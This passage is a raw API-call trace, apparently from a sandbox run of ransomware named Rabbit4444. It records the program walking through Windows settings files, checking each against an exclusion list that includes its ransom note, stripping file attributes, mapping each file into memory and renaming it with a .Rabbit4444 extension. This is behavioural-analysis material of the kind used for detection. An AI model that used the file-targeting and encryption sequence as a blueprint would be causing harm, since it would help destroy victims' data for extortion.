RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0057.234] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.234] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0057.236] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0057.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.237] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.237] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14854797360) returned 1 [0057.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0057.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.237] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.238] CloseHandle (hObject=0x298) returned 1 [0057.238] CloseHandle (hObject=0x278) returned 1 [0057.238] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Device_Add.settingcontent-ms.Rabbit4444") returned 175 [0057.238] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Device_Add.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_device_add.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Device_Add.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_device_add.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.238] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26a3fbbf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x26a3fbbf, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", cAlternateFileName="AA1EEC~1.SET")) returned 1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2=".") returned 1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="..") returned 1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="windows") returned -1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="boot") returned -1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.239] lstrcmpiW (lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.239] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms") returned="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms" [0057.239] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.239] lstrlenW (lpString="AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms") returned 61 [0057.239] lstrlenW (lpString="Rabbit4444") returned 10 [0057.239] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.239] lstrlenW (lpString=".dll") returned 4 [0057.239] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.239] lstrlenW (lpString=".lnk") returned 4 [0057.239] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.239] lstrlenW (lpString=".ini") returned 4 [0057.239] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.239] lstrlenW (lpString=".sys") returned 4 [0057.239] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.239] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_advancedsettings.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.240] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.240] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14855044764) returned 1 [0057.240] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1262) returned 1 [0057.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0057.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0057.240] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.241] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.242] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14855285795) returned 1 [0057.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0057.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0057.242] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.242] CloseHandle (hObject=0x298) returned 1 [0057.242] CloseHandle (hObject=0x278) returned 1 [0057.242] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms.Rabbit4444") returned 189 [0057.242] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_advancedsettings.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_advancedsettings.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.243] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bbd39f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x26bbd39f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_Brightness.settingcontent-ms", cAlternateFileName="AA73A3~1.SET")) returned 1 [0057.243] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.243] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.243] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.243] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2=".") returned 1 [0057.243] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="..") returned 1 [0057.243] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="windows") returned -1 [0057.243] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.244] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.244] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="boot") returned -1 [0057.244] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.244] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.244] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_Brightness.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_Brightness.settingcontent-ms") returned="AAA_SystemSettings_Display_Brightness.settingcontent-ms" [0057.244] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Brightness.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.244] lstrlenW (lpString="AAA_SystemSettings_Display_Brightness.settingcontent-ms") returned 55 [0057.244] lstrlenW (lpString="Rabbit4444") returned 10 [0057.244] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.244] lstrlenW (lpString=".dll") returned 4 [0057.244] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.244] lstrlenW (lpString=".lnk") returned 4 [0057.244] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.244] lstrlenW (lpString=".ini") returned 4 [0057.244] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.244] lstrlenW (lpString=".sys") returned 4 [0057.244] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.244] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Brightness.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_brightness.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.244] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.244] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14855523977) returned 1 [0057.245] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1232) returned 1 [0057.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0057.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0057.245] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.246] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.246] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.247] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.247] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14855766539) returned 1 [0057.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0057.247] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0057.247] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.247] CloseHandle (hObject=0x298) returned 1 [0057.247] CloseHandle (hObject=0x278) returned 1 [0057.247] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Brightness.settingcontent-ms.Rabbit4444") returned 183 [0057.247] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Brightness.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_brightness.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Brightness.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_brightness.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.248] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26d86fde, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x26d86fde, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", cAlternateFileName="AA923B~1.SET")) returned 1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2=".") returned 1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="..") returned 1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="windows") returned -1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="boot") returned -1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.248] lstrcmpiW (lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.248] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms") returned="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms" [0057.248] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.249] lstrlenW (lpString="AAA_SystemSettings_Display_DPI_Override.settingcontent-ms") returned 57 [0057.249] lstrlenW (lpString="Rabbit4444") returned 10 [0057.249] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.249] lstrlenW (lpString=".dll") returned 4 [0057.249] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.249] lstrlenW (lpString=".lnk") returned 4 [0057.249] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.249] lstrlenW (lpString=".ini") returned 4 [0057.249] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.249] lstrlenW (lpString=".sys") returned 4 [0057.249] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_dpi_override.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.249] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.249] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14855983262) returned 1 [0057.249] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1242) returned 1 [0057.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.249] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.250] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.252] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14856236905) returned 1 [0057.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0057.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.252] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.252] CloseHandle (hObject=0x298) returned 1 [0057.252] CloseHandle (hObject=0x278) returned 1 [0057.252] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms.Rabbit4444") returned 185 [0057.252] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_dpi_override.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_dpi_override.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.253] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27166ce9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x27166ce9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", cAlternateFileName="AA3073~1.SET")) returned 1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2=".") returned 1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="..") returned 1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="windows") returned -1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="boot") returned -1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.253] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.253] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_Duplicate.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_Duplicate.settingcontent-ms") 